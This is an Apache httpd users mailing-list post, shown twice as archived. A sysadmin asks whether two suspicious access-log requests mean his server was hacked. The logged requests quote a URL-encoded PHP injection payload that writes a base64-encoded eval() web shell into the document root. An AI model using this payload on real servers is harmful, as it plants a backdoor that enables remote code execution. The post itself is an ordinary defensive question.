Sent: Monday, February 6, 2017 11:15:04 AM GMT -05:00 US/Canada Eastern
Subject: [users@httpd] am i hacked ?

Hi,

just in the moment i found two very weird entries in may access_log:

91.200.12.33 - - [06/Feb/2017:16:43:26 +0100] 236 "GET 
/?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUME
NT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B
 HTTP/1.1" 200 90
91.200.12.33 - - [06/Feb/2017:16:44:33 +0100] 253 "GET 
/?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUME
NT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B
 HTTP/1.1" 200 90

What upsets me is that these two requests have statuscode 200, which mean it 
was successfull.
The IP is from ukraine. Where can i find out what these %charcacters mean ? 
Does anyone understand what happened here ? It's apache 2.2.3 64bit.

Thanks for any hint.

Bernd

-- 
Bernd Lentes 

Systemadministration 
institute of developmental genetics 
Gebäude 35.34 - Raum 208 
HelmholtzZentrum München 
bernd.len...@helmholtz-muenchen.de 
phone: +49 (0)89 3187 1241 
fax: +49 (0)89 3187 2294 

Erst wenn man sich auf etwas festlegt kann man Unrecht haben 
Scott Adams


Helmholtz Zentrum Muenchen
Deutsches Forschungszentrum fuer Gesundheit und Umwelt (GmbH)
Ingolstaedter Landstr. 1
85764 Neuherberg
www.helmholtz-muenchen.de
Aufsichtsratsvorsitzende: MinDir'in Baerbel Brumme-Bothe
Geschaeftsfuehrer: Prof. Dr. Guenther Wess, Heinrich Bassler, Dr. Alfons Enhsen
Registergericht: Amtsgericht Muenchen HRB 6466
USt-IdNr: DE 129521671


-
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org


-
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

[users@httpd] am i hacked ?

2017-02-06 Thread Lentes, Bernd

Hi,

just in the moment i found two very weird entries in may access_log:

91.200.12.33 - - [06/Feb/2017:16:43:26 +0100] 236 "GET 
/?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUME
NT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B
 HTTP/1.1" 200 90
91.200.12.33 - - [06/Feb/2017:16:44:33 +0100] 253 "GET 
/?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUME
NT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B
 HTTP/1.1" 200 90

What upsets me is that these two requests have statuscode 200, which mean it 
was successfull.
The IP is from ukraine. Where can i find out what these %charcacters mean ? 
Does anyone understand what happened here ? It's apache 2.2.3 64bit.

Thanks for any hint.

Bernd

-- 
Bernd Lentes 

Systemadministration 
institute of developmental genetics 
Gebäude 35.34 - Raum 208 
HelmholtzZentrum München 
bernd.len...@helmholtz-muenchen.de 
phone: +49 (0)89 3187 1241 
fax: +49 (0)89 3187 2294 

Erst wenn man sich auf etwas festlegt kann man Unrecht haben 
Scott Adams


Helmholtz Zentrum Muenchen
Deutsches Forschungszentrum fuer Gesundheit und Umwelt (GmbH)
Ingolstaedter Landstr. 1
85764 Neuherberg
www.helmholtz-muenchen.de
Aufsichtsratsvorsitzende: MinDir'in Baerbel Brumme-Bothe
Geschaeftsfuehrer: Prof. Dr. Guenther Wess, Heinrich Bassler, Dr. Alfons Enhsen
Registergericht: Amtsgericht Muenchen HRB 6466
USt-IdNr: DE 129521671


-
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [users@httpd] am i hacked ?

Re: [users@httpd] am i hacked ?

Re: [users@httpd] am i hacked ?

Re: [users@httpd] am i hacked ?

Re: [users@httpd] am i hacked ?

Re: [users@httpd] am i hacked ?

Re: [users@httpd] am i hacked ?

Re: [users@httpd] am i hacked ?

Re: [users@httpd] am i hacked ?

Re: [users@httpd] am i hacked ?

Re: [users@httpd] am i hacked ?

Re: [users@httpd] am i hacked ?

Re: [users@httpd] am i hacked ?

Re: [users@httpd] am i hacked ?

Re: [users@httpd] am i hacked ?

Re: [users@httpd] am i hacked ?

Re: [users@httpd] am i hacked ?

[users@httpd] am i hacked ?

18 matches

Site Navigation

Mail list logo

Footer information